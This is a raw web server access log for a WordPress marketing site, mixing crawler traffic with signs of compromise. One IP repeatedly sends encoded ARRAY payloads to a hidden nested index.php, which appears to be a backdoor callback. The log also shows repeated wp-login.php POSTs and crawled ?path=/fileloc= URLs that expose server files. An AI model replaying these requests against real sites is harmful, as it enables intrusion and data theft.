142.4.205.1 - - [17/Oct/2025:10:15:42 -0400] "GET /njABawTk/njABawTk/njABawTk/index.php?ARRAY=7o2230223n313736303731343134322p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303731303534322q3832323133386365346666396231383166643739336231383664623564326130222p2232223n226532636665346139653937636530383933626234633932343232333362363764222p2233223n223731336661633265343537656430663232613737336362393365396137343664222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231372q34382q35312q36362q37312q38392q3231227q HTTP/1.0" 504 4358 "-" "-"
185.191.171.14 - - [17/Oct/2025:10:16:44 -0400] "GET /products/chirotonsor1280524?id=84 HTTP/1.0" 200 9227 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
103.176.179.125 - - [17/Oct/2025:10:16:48 -0400] "GET /wp-login.php HTTP/1.0" 200 9227 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0 Safari/605.1.15"
85.208.96.198 - - [17/Oct/2025:10:16:54 -0400] "GET /products/hamel1760304?id=475 HTTP/1.0" 200 9227 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
103.176.179.125 - - [17/Oct/2025:10:16:57 -0400] "POST /wp-login.php HTTP/1.0" 200 9227 "https://academiedumarketing.com/wp-login.php" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0 Safari/605.1.15"
142.4.205.1 - - [17/Oct/2025:10:16:02 -0400] "GET /njABawTk/njABawTk/njABawTk/index.php?ARRAY=7o2230223n313736303731343136322p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303731303536322q6262333833343335343766336630313039383535383139333939376664363737222p2232223n226532636665346139653937636530383933626234633932343232333362363764222p2233223n223731336661633265343537656430663232613737336362393365396137343664222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231372q34382q35312q36362q37312q38392q3231227q HTTP/1.0" 504 4358 "-" "-"
185.191.171.1 - - [17/Oct/2025:10:17:13 -0400] "GET /products/browning997708?id=461 HTTP/1.0" 200 9227 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
142.4.205.1 - - [17/Oct/2025:10:16:22 -0400] "GET /njABawTk/njABawTk/njABawTk/index.php?ARRAY=7o2230223n313736303731343138322p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303731303538322q3735303532613464656132363061393133636534643633346230313336333339222p2232223n226532636665346139653937636530383933626234633932343232333362363764222p2233223n223731336661633265343537656430663232613737336362393365396137343664222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231372q34382q35312q36362q37312q38392q3231227q HTTP/1.0" 504 4358 "-" "-"
185.191.171.19 - - [17/Oct/2025:10:17:33 -0400] "GET /products/distillatory312926?id=848 HTTP/1.0" 200 9227 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
85.208.96.198 - - [17/Oct/2025:10:17:35 -0400] "GET /products/comprehensibly1703825?id=179 HTTP/1.0" 200 9227 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
142.4.205.1 - - [17/Oct/2025:10:16:42 -0400] "GET /njABawTk/njABawTk/njABawTk/index.php?ARRAY=7o2230223n313736303731343230322p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303731303630322q3535333430306536303130653866393163333831383130366539616136663933222p2232223n226532636665346139653937636530383933626234633932343232333362363764222p2233223n223731336661633265343537656430663232613737336362393365396137343664222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231372q34382q35312q36362q37312q38392q3231227q HTTP/1.0" 504 4358 "-" "-"
216.73.216.189 - - [17/Oct/2025:10:17:45 -0400] "GET /category/uncategorized?fileloc=%2Fvar%2Fwww%2Fvhosts%2Facademiedumarketing.com%2Fwww%2Fwp-content%2Fthemes%2Ftwentytwentyfour%2Fstyles%2Frust.json&path=%2Fvar%2Fwww%2Fvhosts%2Facademiedumarketing.com%2Fwww%2Fwp-content%2Fthemes%2Ftwentytwentyfour%2Fstyles HTTP/1.0" 200 7379 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [17/Oct/2025:10:17:46 -0400] "GET /category/uncategorized?path=%2Fvar%2Fwww%2Fvhosts%2Facademiedumarketing.com%2Fwww%2Fwp-content%2Fthemes%2Ftwentytwentyfive%2Fparts%2Fparts HTTP/1.0" 200 7103 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [17/Oct/2025:10:17:46 -0400] "GET /category/uncategorized?fileloc=%2Fvar%2Fwww%2Fvhosts%2Facademiedumarketing.com%2Fwww%2Fwp-content%2Fthemes%2Ftwentytwentyfive%2Fparts%2Fsidebar.html&path=%2Fvar%2Fwww%2Fvhosts%2Facademiedumarketing.com%2Fwww%2Fwp-content%2Fthemes%2Ftwentytwentyfive%2Fparts HTTP/1.0" 200 6774 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [17/Oct/2025:10:17:47 -0400] "GET /category/uncategorized?fileloc=%2Fvar%2Fwww%2Fvhosts%2Facademiedumarketing.com%2Fwww%2Fwp-content%2Fthemes%2Ftwentytwentyfive%2Fparts%2Ffooter.html&path=%2Fvar%2Fwww%2Fvhosts%2Facademiedumarketing.com%2Fwww%2Fwp-content%2Fthemes%2Ftwentytwentyfive%2Fparts HTTP/1.0" 200 6768 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
114.119.146.77 - - [17/Oct/2025:10:17:47 -0400] "GET /2025/10/05/tips-strategi-jitu-togel-tahun-ini/?path=/var/www/vhosts/academiedumarketing.com/public_html/IwMWUFYpGl HTTP/1.0" 200 7143 "https://academiedumarketing.com/2025/10/05/tips-strategi-jitu-togel-tahun-ini/" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
216.73.216.189 - - [17/Oct/2025:10:17:47 -0400] "GET /category/uncategorized?fileloc=%2Fvar%2Fwww%2Fvhosts%2Facademiedumarketing.com%2Fwww%2Fwp-content%2Fthemes%2Ftwentytwentyfour%2Fstyles%2Ffossil.json&path=%2Fvar%2Fwww%2Fvhosts%2Facademiedumarketing.com%2Fwww%2Fwp-content%2Fthemes%2Ftwentytwentyfour%2Fstyles HTTP/1.0" 200 8148 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [17/Oct/2025:10:17:48 -0400] "GET /category/uncategorized?fileloc=%2Fvar%2Fwww%2Fvhosts%2Facademiedumarketing.com%2Fwww%2Fwp-content%2Fthemes%2Ftwentytwentythree%2Fparts%2Ffooter.html&path=%2Fvar%2Fwww%2Fvhosts%2Facademiedumarketing.com%2Fwww%2Fwp-content%2Fthemes%2Ftwentytwentythree%2Fparts HTTP/1.0" 200 6772 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [17/Oct/2025:10:17:48 -0400] "GET /category/uncategorized?path=%2Fvar%2Fwww%2Fvhosts%2Facademiedumarketing.com%2Fwww%2Fwp-content%2Fthemes%2Ftwentytwentyfour%2Fassets%2Ffonts HTTP/1.0" 200 7157 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [17/Oct/2025:10:17:49 -0400] "GET /category/uncategorized?path=%2Fvar%2Fwww%2Fvhosts%2Facademiedumarketing.com%2Fwww%2Fwp-content%2Fthemes%2Fconsultstreet%2Fassets%2Fcss HTTP/1.0" 200 7409 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [17/Oct/2025:10:17:49 -0400] "GET /category/uncategorized?fileloc=%2Fvar%2Fwww%2Fvhosts%2Facademiedumarketing.com%2Fwww%2Fwp-content%2Fthemes%2Ftwentytwentyfive%2Fparts%2Fheader.html&path=%2Fvar%2Fwww%2Fvhosts%2Facademiedumarketing.com%2Fwww%2Fwp-content%2Fthemes%2Ftwentytwentyfive%2Fparts HTTP/1.0" 200 6769 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
43.130.57.76 - - [17/Oct/2025:10:17:58 -0400] "GET / HTTP/1.0" 200 9227 "http://academiedumarketing.com" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
66.249.65.195 - - [17/Oct/2025:10:17:58 -0400] "GET /product/edit/A2593836075 HTTP/1.0" 200 24521 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; GoogleOther)"
66.249.65.196 - - [17/Oct/2025:10:17:58 -0400] "GET /?_g=970268 HTTP/1.0" 200 24334 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
142.4.205.1 - - [17/Oct/2025:10:17:02 -0400] "GET /njABawTk/njABawTk/njABawTk/index.php?ARRAY=7o2230223n313736303731343232322p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303731303632322q3931616461623666626537613230633539633031303065363338376439313064222p2232223n226532636665346139653937636530383933626234633932343232333362363764222p2233223n223731336661633265343537656430663232613737336362393365396137343664222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231372q34382q35312q36362q37312q38392q3231227q HTTP/1.0" 504 4358 "-" "-"
185.191.171.12 - - [17/Oct/2025:10:18:06 -0400] "GET /products/depression449484?id=267 HTTP/1.0" 200 9227 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.18 - - [17/Oct/2025:10:18:08 -0400] "GET /products/generatively312443?id=735 HTTP/1.0" 200 9227 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.1 - - [17/Oct/2025:10:18:09 -0400] "GET /products/acinose1131780?id=123 HTTP/1.0" 200 9227 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
142.4.205.1 - - [17/Oct/2025:10:17:22 -0400] "GET /njABawTk/njABawTk/njABawTk/index.php?ARRAY=7o2230223n313736303731343234322p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303731303634322q3234623261656461326133316232303933383866316336303965626138646366222p2232223n226532636665346139653937636530383933626234633932343232333362363764222p2233223n223731336661633265343537656430663232613737336362393365396137343664222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231372q34382q35312q36362q37312q38392q3231227q HTTP/1.0" 504 4358 "-" "-"
185.191.171.2 - - [17/Oct/2025:10:18:22 -0400] "GET /products/consignify1376744?id=765 HTTP/1.0" 200 9227 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
85.208.96.212 - - [17/Oct/2025:10:18:40 -0400] "GET /products/anticeremonialism1531556?id=985 HTTP/1.0" 200 9227 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
142.4.205.1 - - [17/Oct/2025:10:17:42 -0400] "GET /njABawTk/njABawTk/njABawTk/index.php?ARRAY=7o2230223n313736303731343236322p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303731303636322q3133633463613634656634636439366136366237393230623061376363326336222p2232223n226532636665346139653937636530383933626234633932343232333362363764222p2233223n223731336661633265343537656430663232613737336362393365396137343664222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231372q34382q35312q36362q37312q38392q3231227q HTTP/1.0" 504 4358 "-" "-"
85.208.96.209 - - [17/Oct/2025:10:18:42 -0400] "GET /products/intolerableness1340057?id=208 HTTP/1.0" 200 9227 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
216.73.216.189 - - [17/Oct/2025:10:18:52 -0400] "GET /category/';txt%20+=%20'%3C'%20+%20node.getAttribute('src' HTTP/1.0" 200 9227 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [17/Oct/2025:10:18:53 -0400] "GET /category/url%20=%3Cwidth%3Ex%3Cheight%3E%20%22optional%20title%22 HTTP/1.0" 200 9227 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [17/Oct/2025:10:18:53 -0400] "GET /category/%22,t+=%22%3C%22+e.getAttribute(%22src%22 HTTP/1.0" 200 9227 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [17/Oct/2025:10:18:54 -0400] "GET /category/uncategorized?path=%2Fvar%2Fwww%2Fvhosts%2Facademiedumarketing.com%2Fwww%2Fwp-content%2Fthemes%2Ftwentynineteen%2Ffonts%2Ffonts HTTP/1.0" 200 7163 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [17/Oct/2025:10:18:54 -0400] "GET /category/uncategorized?path=%2Fvar%2Fwww%2Fvhosts%2Facademiedumarketing.com%2Fwww%2Fwp-content%2Fthemes%2Fconsultstreet%2Fassets%2Fimg HTTP/1.0" 200 7192 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [17/Oct/2025:10:18:55 -0400] "GET /category/uncategorized?fileloc=%2Fvar%2Fwww%2Fvhosts%2Facademiedumarketing.com%2Fwww%2Fwp-content%2Fthemes%2Ftwentytwentyfour%2Fstyles%2Fmint.json&path=%2Fvar%2Fwww%2Fvhosts%2Facademiedumarketing.com%2Fwww%2Fwp-content%2Fthemes%2Ftwentytwentyfour%2Fstyles HTTP/1.0" 200 7615 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [17/Oct/2025:10:18:55 -0400] "GET /category/uncategorized?fileloc=%2Fvar%2Fwww%2Fvhosts%2Facademiedumarketing.com%2Fwww%2Fwp-content%2Fthemes%2Ftwentytwentyfour%2Fstyles%2Fice.json&path=%2Fvar%2Fwww%2Fvhosts%2Facademiedumarketing.com%2Fwww%2Fwp-content%2Fthemes%2Ftwentytwentyfour%2Fstyles HTTP/1.0" 200 8185 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [17/Oct/2025:10:18:56 -0400] "GET /category/uncategorized?fileloc=%2Fvar%2Fwww%2Fvhosts%2Facademiedumarketing.com%2Fwww%2Fwp-content%2Fthemes%2Ftwentytwentyfour%2Fstyles%2Fember.json&path=%2Fvar%2Fwww%2Fvhosts%2Facademiedumarketing.com%2Fwww%2Fwp-content%2Fthemes%2Ftwentytwentyfour%2Fstyles HTTP/1.0" 200 8054 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [17/Oct/2025:10:18:56 -0400] "GET /category/uncategorized?fileloc=%2Fvar%2Fwww%2Fvhosts%2Facademiedumarketing.com%2Fwww%2Fwp-content%2Fthemes%2Ftwentytwentyfour%2Fstyles%2Fonyx.json&path=%2Fvar%2Fwww%2Fvhosts%2Facademiedumarketing.com%2Fwww%2Fwp-content%2Fthemes%2Ftwentytwentyfour%2Fstyles HTTP/1.0" 200 7362 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
142.4.205.1 - - [17/Oct/2025:10:18:02 -0400] "GET /njABawTk/njABawTk/njABawTk/index.php?ARRAY=7o2230223n313736303731343238322p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303731303638322q6338303036303239366465366162303533326233326561306136666535653166222p2232223n226532636665346139653937636530383933626234633932343232333362363764222p2233223n223731336661633265343537656430663232613737336362393365396137343664222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231372q34382q35312q36362q37312q38392q3231227q HTTP/1.0" 504 4358 "-" "-"
66.249.65.197 - - [17/Oct/2025:10:19:04 -0400] "GET /?_g=1319955 HTTP/1.0" 200 24273 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
103.176.179.125 - - [17/Oct/2025:10:19:04 -0400] "GET /wp-login.php HTTP/1.0" 200 9227 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0 Safari/605.1.15"
103.176.179.125 - - [17/Oct/2025:10:19:08 -0400] "POST /wp-login.php HTTP/1.0" 200 9227 "https://academiedumarketing.com/wp-login.php" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0 Safari/605.1.15"
114.119.152.60 - - [17/Oct/2025:10:19:13 -0400] "GET /2025/10/03/best-strategies-for-togel-players/?path=/var/www/vhosts/academiedumarketing.com/public_html/wp-content/languages/plugins HTTP/1.0" 200 7336 "https://academiedumarketing.com/2025/10/03/best-strategies-for-togel-players/?path=/var/www/vhosts/academiedumarketing.com/public_html/wp-content/languages" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
142.4.205.1 - - [17/Oct/2025:10:18:22 -0400] "GET /njABawTk/njABawTk/njABawTk/index.php?ARRAY=7o2230223n313736303731343330322p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303731303730322q3831316232386533326437333636616261336532613264386364306538393631222p2232223n226532636665346139653937636530383933626234633932343232333362363764222p2233223n223731336661633265343537656430663232613737336362393365396137343664222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231372q34382q35312q36362q37312q38392q3231227q HTTP/1.0" 504 4358 "-" "-"
85.208.96.195 - - [17/Oct/2025:10:19:26 -0400] "GET /products/megalesian245349?id=26 HTTP/1.0" 200 9227 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
216.73.216.189 - - [17/Oct/2025:10:19:38 -0400] "GET /category/uncategorized?path=%2Fvar%2Fwww%2Fvhosts%2Facademiedumarketing.com%2Fwww%2Fwp-includes%2Fjs%2Fdist%2Fscript-modules%2Finteractivity HTTP/1.0" 200 7202 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [17/Oct/2025:10:19:38 -0400] "GET /category/uncategorized?path=%2Fvar%2Fwww%2Fvhosts%2Facademiedumarketing.com%2Fwww%2Fwp-includes%2Fjs%2Fdist%2Fscript-modules%2Fblock-library HTTP/1.0" 200 7232 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [17/Oct/2025:10:19:38 -0400] "GET /category/uncategorized?path=%2Fvar%2Fwww%2Fvhosts%2Facademiedumarketing.com%2Fwww%2Fwp-includes%2FSimplePie%2Fsrc%2FXML%2FDeclaration HTTP/1.0" 200 7066 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
85.208.96.198 - - [17/Oct/2025:10:19:39 -0400] "GET /products/aphilanthropy587733?id=205 HTTP/1.0" 200 9227 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
216.73.216.189 - - [17/Oct/2025:10:19:39 -0400] "GET /category/uncategorized?path=%2Fvar%2Fwww%2Fvhosts%2Facademiedumarketing.com%2Fwww%2Fwp-includes%2Fjs%2Fdist%2Fscript-modules%2Finteractivity-router HTTP/1.0" 200 7122 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [17/Oct/2025:10:19:39 -0400] "GET /category/uncategorized?fileloc=%2Fvar%2Fwww%2Fvhosts%2Facademiedumarketing.com%2Fwww%2Fwp-includes%2FSimplePie%2Fsrc%2FParse%2FDate.php&path=%2Fvar%2Fwww%2Fvhosts%2Facademiedumarketing.com%2Fwww%2Fwp-includes%2FSimplePie%2Fsrc%2FParse HTTP/1.0" 200 13379 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [17/Oct/2025:10:19:40 -0400] "GET /category/uncategorized?fileloc=%2Fvar%2Fwww%2Fvhosts%2Facademiedumarketing.com%2Fwww%2Fwp-includes%2FSimplePie%2Fsrc%2FCache%2FPsr16.php&path=%2Fvar%2Fwww%2Fvhosts%2Facademiedumarketing.com%2Fwww%2Fwp-includes%2FSimplePie%2Fsrc%2FCache HTTP/1.0" 200 8639 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
185.191.171.19 - - [17/Oct/2025:10:19:40 -0400] "GET /products/cyanite20443?id=76 HTTP/1.0" 200 9227 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
216.73.216.189 - - [17/Oct/2025:10:19:40 -0400] "GET /category/uncategorized?path=%2Fvar%2Fwww%2Fvhosts%2Facademiedumarketing.com%2Fwww%2Fwp-includes%2FSimplePie%2Fsrc%2FDecode%2FHTML HTTP/1.0" 200 7067 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [17/Oct/2025:10:19:41 -0400] "GET /category/uncategorized?fileloc=%2Fvar%2Fwww%2Fvhosts%2Facademiedumarketing.com%2Fwww%2Fwp-includes%2FSimplePie%2Fsrc%2FCache%2FMemcache.php&path=%2Fvar%2Fwww%2Fvhosts%2Facademiedumarketing.com%2Fwww%2Fwp-includes%2FSimplePie%2Fsrc%2FCache HTTP/1.0" 200 8879 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
142.4.205.1 - - [17/Oct/2025:10:18:42 -0400] "GET /njABawTk/njABawTk/njABawTk/index.php?ARRAY=7o2230223n313736303731343332322p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303731303732322q6361336339333835306364383439646262356430383238303461383866626165222p2232223n226532636665346139653937636530383933626234633932343232333362363764222p2233223n223731336661633265343537656430663232613737336362393365396137343664222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231372q34382q35312q36362q37312q38392q3231227q HTTP/1.0" 504 4358 "-" "-"
216.73.216.189 - - [17/Oct/2025:10:19:41 -0400] "GET /category/uncategorized?fileloc=%2Fvar%2Fwww%2Fvhosts%2Facademiedumarketing.com%2Fwww%2Fwp-includes%2FSimplePie%2Fsrc%2FCache%2FFile.php&path=%2Fvar%2Fwww%2Fvhosts%2Facademiedumarketing.com%2Fwww%2Fwp-includes%2FSimplePie%2Fsrc%2FCache HTTP/1.0" 200 8555 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
85.208.96.212 - - [17/Oct/2025:10:19:43 -0400] "GET /products/craving577991?id=193 HTTP/1.0" 200 9227 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
43.166.1.243 - - [17/Oct/2025:10:19:44 -0400] "GET / HTTP/1.0" 200 9227 "http://www.academiedumarketing.com" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
85.208.96.199 - - [17/Oct/2025:10:19:47 -0400] "GET /products/cosmopolis1708903?id=912 HTTP/1.0" 200 9227 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.19 - - [17/Oct/2025:10:19:57 -0400] "GET /products/dysgenics970231?id=910 HTTP/1.0" 200 9227 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
142.4.205.1 - - [17/Oct/2025:10:19:02 -0400] "GET /njABawTk/njABawTk/njABawTk/index.php?ARRAY=7o2230223n313736303731343334322p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303731303734322q6434366330363031373937366664346566373863646365313433386364376561222p2232223n226532636665346139653937636530383933626234633932343232333362363764222p2233223n223731336661633265343537656430663232613737336362393365396137343664222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231372q34382q35312q36362q37312q38392q3231227q HTTP/1.0" 504 4358 "-" "-"
185.191.171.5 - - [17/Oct/2025:10:20:21 -0400] "GET /products/electrocardiogram495362?id=553 HTTP/1.0" 200 9227 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
142.4.205.1 - - [17/Oct/2025:10:19:22 -0400] "GET /njABawTk/njABawTk/njABawTk/index.php?ARRAY=7o2230223n313736303731343336322p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303731303736322q3930356631346333316465303330663131613161633166353536373930623330222p2232223n226532636665346139653937636530383933626234633932343232333362363764222p2233223n223731336661633265343537656430663232613737336362393365396137343664222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231372q34382q35312q36362q37312q38392q3231227q HTTP/1.0" 504 4358 "-" "-"
185.191.171.10 - - [17/Oct/2025:10:20:31 -0400] "GET /products/duodenitis1100018?id=606 HTTP/1.0" 200 9227 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
114.119.145.188 - - [17/Oct/2025:10:20:36 -0400] "GET /2019/09/06/hello-world/?path=/var/www/vhosts/academiedumarketing.com/public_html/wp-includes/blocks/widget-group HTTP/1.0" 200 7124 "https://academiedumarketing.com/2019/09/06/hello-world/?path=/var/www/vhosts/academiedumarketing.com/public_html/wp-includes/blocks" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
